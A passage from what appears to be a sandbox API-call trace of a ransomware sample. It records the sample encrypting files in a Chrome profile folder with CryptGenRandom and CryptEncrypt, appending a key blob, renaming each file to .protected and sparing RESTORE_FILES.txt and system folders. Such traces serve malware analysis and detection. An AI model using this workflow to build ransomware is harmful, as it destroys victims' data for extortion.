pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.319] StrStrW (lpFirst="Shortcuts", lpSrch=".txt") returned 0x0 [0084.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.319] StrStrW (lpFirst="Shortcuts", lpSrch=".rar") returned 0x0 [0084.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned 89 [0084.319] StrStrW (lpFirst="Shortcuts", lpSrch=".zip") returned 0x0 [0084.319] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.331] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.331] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.332] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.332] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.332] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.332] CloseHandle (hObject=0x154) returned 1 [0084.333] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.protected") returned 99 [0084.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts.protected")) returned 1 [0084.334] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="Windows") returned -1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="Program Files") returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="Program Files (x86)") returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="$Recycle.bin") returned 1 [0084.334] lstrcmpiW (lpString1="Shortcuts-journal", lpString2="System Volume Information") returned -1 [0084.334] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.334] StrStrIW (lpFirst="Shortcuts-journal", lpSrch=".protected") returned 0x0 [0084.334] lstrcmpW (lpString1="Shortcuts-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.334] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.334] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.334] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".txt") returned 0x0 [0084.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.334] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".rar") returned 0x0 [0084.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal") returned 97 [0084.335] StrStrW (lpFirst="Shortcuts-journal", lpSrch=".zip") returned 0x0 [0084.335] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.335] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.335] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.335] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.336] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.336] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.336] CloseHandle (hObject=0x154) returned 1 [0084.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.protected") returned 107 [0084.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts-journal.protected")) returned 1 [0084.338] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="Windows") returned -1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="Program Files") returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="Program Files (x86)") returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="$Recycle.bin") returned 1 [0084.338] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="System Volume Information") returned -1 [0084.338] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned 103 [0084.338] lstrcmpW (lpString1="Sync Extension Settings", lpString2=".") returned 1 [0084.338] lstrcmpW (lpString1="Sync Extension Settings", lpString2="..") returned 1 [0084.338] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*") returned 105 [0084.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.339] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.339] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.339] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.339] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.339] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\.") returned 105 [0084.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.339] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.339] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.339] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\..") returned 106 [0084.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.339] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Windows") returned -1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files") returned -1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files (x86)") returned -1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="$Recycle.bin") returned 1 [0084.339] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="System Volume Information") returned -1 [0084.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 136 [0084.339] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2=".") returned 1 [0084.339] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="..") returned 1 [0084.339] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*") returned 138 [0084.339] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0084.346] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.346] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.346] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.346] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.346] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.346] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\.") returned 138 [0084.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.346] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.346] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.346] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.346] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.346] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\..") returned 139 [0084.346] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.346] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0084.346] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0084.346] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0084.347] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0084.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0084.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0084.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log") returned 147 [0084.347] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0084.348] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.348] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.348] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.348] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.348] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.349] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.349] CloseHandle (hObject=0x15c) returned 1 [0084.349] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.protected") returned 157 [0084.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log.protected")) returned 1 [0084.350] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0084.350] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0084.350] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.350] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0084.350] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0084.350] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.350] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.351] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0084.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.351] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0084.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT") returned 144 [0084.351] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0084.351] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.352] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.352] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.352] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.352] CloseHandle (hObject=0x15c) returned 1 [0084.352] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.protected") returned 154 [0084.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current.protected")) returned 1 [0084.353] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0084.353] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0084.353] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned 141 [0084.353] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0084.353] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0084.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js 